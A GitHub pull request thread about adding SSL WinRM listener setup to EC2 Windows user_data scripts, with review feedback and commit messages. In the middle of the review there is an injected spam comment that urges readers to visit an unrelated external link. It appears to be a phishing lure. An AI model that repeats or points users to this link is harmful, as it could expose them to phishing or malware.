Add ssl config user data for ssl transport, if required append to user_data script specified by user. #363
Conversation
|
Completed implementation and testing. |
| exit 1 | ||
| when ps_start_tag_index && ps_end_tag_index | ||
| script_lines[ps_end_tag_index] = ssl_config_user_data + ps_end_tag | ||
| modify_user_data_file(script_lines.join) |
There was a problem hiding this comment.
Why we are tampering with user's file? Sometime user might use same user data script with plaintext transport
There was a problem hiding this comment.
@siddheshwar-more I will modify code to not to modify user's user_data file and will push the latest changes after validating/testing all scenarios.
|
@siddheshwar-more made changes as per your comments and successfully tested it for all the scenarios. |
| <<-EOH | ||
|
|
||
| $vm_name = invoke-restmethod -uri http://169.254.169.254/latest/meta-data/public-ipv4 | ||
| winrm quickconfig -q |
There was a problem hiding this comment.
We should do this only if winrm is not enabled (probably by checking the status of the winrm service). Also, this creates a plaintext listener -- if we see that there's a new listener in existence after winrm quickconfig -q, we should delete that listener since we don't actually want the plaintext listener.
There was a problem hiding this comment.
Hey,
Our mutual friends just told such a great news, they have a surprise for you! Just take a look http://gychycyrdy.palmcitymillwork.biz/oizzgkz
Later, [email protected]
|
I think separately we should have a "--no-create-ssl-listener" option where we do nothing here -- that handles the case for custom images that might already have an ssl listener configured. |
|
I have implemented and tested the changes as per the above comments. |
|
Looks good, I tested it out and it worked perfectly for me. Please rebase and merge. |
…r_data script specified by user.
…ed through ec2-metadata and also added RSpecs.
…config code, also updated RSpecs and successfully tested the changes with all the scenarios.
…HTTP plaintext listener if it exist, added create-no-ssl-listener option which does not adds ssl config when specified, updated RSpecs and successfully tested the changes for all the scenarios.
NimishaS
force-pushed
the
ali/add_ssl_config_user_data
branch
from
24ef04a
to
cddc8d0
Compare
…ser_data Add ssl config user data for ssl transport, if required append to user_data script specified by user.
In-progress